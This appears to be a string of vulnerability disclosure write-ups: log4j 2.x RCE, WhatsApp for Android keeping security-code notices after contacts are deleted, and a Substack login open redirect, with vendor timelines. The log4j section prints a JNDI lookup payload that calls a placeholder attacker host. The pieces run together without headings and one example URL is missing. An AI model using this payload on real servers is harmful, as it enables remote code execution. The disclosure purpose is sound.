Vulnerabilities come out all the time, but few of them reach the highest possible level of severity: remote code execution (RCE), and this one checks that box. That means that every server running Java within your company becomes everyone’s computer – an attacker can run anything they want there and then use it as a springboard to tunnel in further.
Exploitability
There are many severe vulnerabilities out there that require specialized knowledge to exploit, including speaking dead computer languages and building weird binaries during a full moon. With this one, you can begin the exploit by copy/pasting a string from a tweet into a search bar, combined with a DNS lookup.
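To make that concrete, the widely circulated probe string looked roughly like the placeholder below (“attacker.example” is illustrative). When a vulnerable log4j 2.x (before 2.15.0) logs it, e.g. from a User-Agent header or a search box, the library performs an outbound JNDI/LDAP lookup to the attacker’s server:

```shell
# Illustrative only: the style of lookup string that circulated publicly.
# Logging this string on a vulnerable log4j 2.x setup triggers an
# outbound JNDI/LDAP lookup to the embedded hostname.
payload='${jndi:ldap://attacker.example/a}'
echo "User-Agent: $payload"
```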
WhatsApp for Android retains contact info locally after contacts are deleted. This would allow an attacker with physical access to the device to check whether the WhatsApp user had interactions with specific contacts, even though they have been deleted.
Vulnerability Details
When a contact is deleted in WhatsApp, information about their security code changes is retained (while the chat content is not). The only way to get rid of it is to select “Clear Chat” for the contact before deleting it; even deleting the chat itself doesn’t help unless the “Clear Chat” operation is done first. The “security code change notifications” option must be enabled for this behavior to manifest.
Someone with access to the user’s device can figure out whether they ever chatted with specific contacts, even if those contacts and their chats are no longer on the device. This is a privacy issue – especially for journalists and people living in dangerous countries.
Since WhatsApp uses Android’s contacts app for contact information but supports chats with numbers that aren’t contacts, our theory is that the application retains information about security code changes even for contacts no longer on the device. There seems to be a discrepancy between how the “Clear Chat” and “Delete Chat” options are implemented in the application, with only the former deleting security notification data.
To reproduce:
Delete a chat with a contact that had security code changes before.
Delete the contact from the device via the Android Contacts app.
Re-add contact to the device via the Android Contacts app.
Start a new chat in WhatsApp with that contact but do not send any messages.
Observe that security code changes are listed with dates in the chat.
Select “Clear Chat” to remove the security code changes, and repeat steps 1-4. Observe that the security code changes no longer appear.
Tested on WhatsApp for Android, app version 2.21.20.20, running on Android 12.
Vendor Response
We haven’t retested on a more recent version but our recommendation to users is to use the “Clear Chat” option in order to prevent this.
The vendor will not be fixing this issue; here is their response:
As part of the attack scenario you describe getting access to a person’s WhatsApp account to obtain private data, as you mention yourself, people do have a way to remove these messages from their account, if a bad actor gets access to their WhatsApp account prior to that person deleting that information then they will be able to view this information. As such, we are closing this report.
2021-10-24: Initial report sent to the vendor, report ID assigned
2021-10-27: Vendor asks for more info; additional info and screenshots sent
2021-11-03: Vendor sent interim status report, still investigating
2021-11-09: Vendor rejects the vulnerability and closes the report
2021-12-30: Public disclosure
Substack had an open redirect vulnerability in their login flow which would have allowed an attacker to facilitate phishing attacks. The vendor has deployed a fix for this issue.
Vulnerability Details
Substack is an online platform that allows users to create and operate free and paid subscription newsletters. The platform had an open redirect vulnerability in its login flow which would redirect users to any site after login completed. This could have been used by an attacker to facilitate phishing attacks targeting Substack users and steal their credentials.
The vulnerability was due to the fact that the redirect parameter in the login flow wasn’t validated to ensure that the redirect only goes to a specific set of URLs. The attacker could specify their own redirect URL as follows:
Once a correct reporting channel was established, the issue was reported to the vendor and a fix was deployed limiting the redirect parameter to Substack-specific URLs.
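A sketch of the allowlist idea follows; the hostnames are illustrative and the real fix lives server-side in Substack’s login flow, not in a shell function:

```shell
#!/bin/sh
# Sketch: allowlist validation for a post-login redirect parameter.
# Accept only https URLs whose hostname is the expected domain or a
# subdomain of it; everything else is rejected.
allowed_redirect() {
  case "$1" in https://*) ;; *) return 1 ;; esac   # require https
  host=${1#https://}
  host=${host%%[/?#]*}                             # isolate the hostname
  case "$host" in
    substack.com|*.substack.com) return 0 ;;
    *)                           return 1 ;;
  esac
}

allowed_redirect "https://example.substack.com/account" && echo allowed || echo blocked
allowed_redirect "https://evil.example/login"           && echo allowed || echo blocked
```

Matching on the isolated hostname, rather than substring-matching the whole URL, avoids trivial bypasses like embedding the allowed domain in the path or query string.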
2021-07-08: Initial contact with the vendor, asking for a correct reporting channel
2021-07-09: Initial reply received, confirming communication channel
2021-07-13: Pinged again – no response from the vendor; pinged company co-founders on Twitter
2021-07-13: Communication with the vendor re-established, technical details sent
2021-07-23: Pinged for status, no response
2021-07-29: Vendor responded that a fix has been implemented
2021-07-29: Fix confirmed; vendor pinged for disclosure coordination – no response
2021-08-22: Public disclosure